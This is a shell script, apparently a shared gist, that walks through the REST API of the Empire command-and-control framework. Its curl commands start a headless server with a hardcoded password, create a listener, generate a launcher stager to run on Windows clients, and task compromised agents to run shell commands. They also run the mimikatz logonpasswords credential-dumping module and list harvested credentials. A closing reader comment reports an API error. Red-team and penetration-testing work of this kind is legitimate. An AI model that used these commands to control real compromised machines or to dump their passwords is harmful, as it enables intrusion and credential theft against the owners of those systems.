Empire RESTful API usage

rest.sh

# start empire headless with the specified API username and password
./empire --headless --username empireadmin --password 'Password123!'

# login and the current server token
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/admin/login -X POST -d '{"username":"empireadmin", "password":"Password123!"}'

# store the token in a variable
TOKEN=<API_token>

# see listener options
curl --insecure -i https://localhost:1337/api/listeners/options?token=$TOKEN

# create a listener
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/listeners?token=$TOKEN -X POST -d '{"Name":"testing"}'

# verify listener was created
curl --insecure -i https://localhost:1337/api/listeners?token=$TOKEN

# get the stager for this listener
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/stagers?token=$TOKEN -X POST -d '{"StagerName":"launcher", "Listener":"testing"}'

# execute stager on a Windows client

# see registered agents
curl --insecure -i https://localhost:1337/api/agents?token=$TOKEN

# grab the agent name and store it in a variable
AGENT=<sessionID>

# task the agent to run a shell command
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/agents/$AGENT/shell?token=$TOKEN -X POST -d '{"command":"whoami"}'

# task all agents to run a shell command
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/agents/all/shell?token=$TOKEN -X POST -d '{"command":"pwd"}'

# task the agent to run a module
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/modules/credentials/mimikatz/logonpasswords?token=$TOKEN -X POST -d "{\"Agent\":\"$AGENT\"}"

# clear all agent taskings
# curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/agents/all/clear?token=$TOKEN

# get agent results
curl --insecure -i https://localhost:1337/api/agents/$AGENT/results?token=$TOKEN

# get all agent results
curl --insecure -i https://localhost:1337/api/agents/all/results?token=$TOKEN

# clear all agent result buffers
curl --insecure -i https://localhost:1337/api/agents/all/results?token=$TOKEN -X DELETE

# see stored credentials
curl --insecure -i https://localhost:1337/api/creds?token=$TOKEN

# rename the agent
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/agents/$AGENT/rename?token=$TOKEN -X POST -d '{"newname":"newagent"}'

# kill the agent
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/agents/newagent/kill?token=$TOKEN -X POST

# confirm kill
curl --insecure -i https://localhost:1337/api/agents?token=$TOKEN

# get any stale agents
curl --insecure -i https://localhost:1337/api/agents/stale?token=$TOKEN

# remove stale agents
curl --insecure -i https://localhost:1337/api/agents/stale?token=$TOKEN -X DELETE

# restart the server
curl --insecure -i https://localhost:1337/api/admin/restart?token=$TOKEN

# kill all listeners
curl --insecure -i https://localhost:1337/api/listeners/all?token=$TOKEN -X DELETE

# shut down the server
curl --insecure -i https://localhost:1337/api/admin/shutdown?token=$TOKEN

When I do a POST to create a listener, I am getting the error message "Method not allowed". I think you have missed the listener type in the POST URL.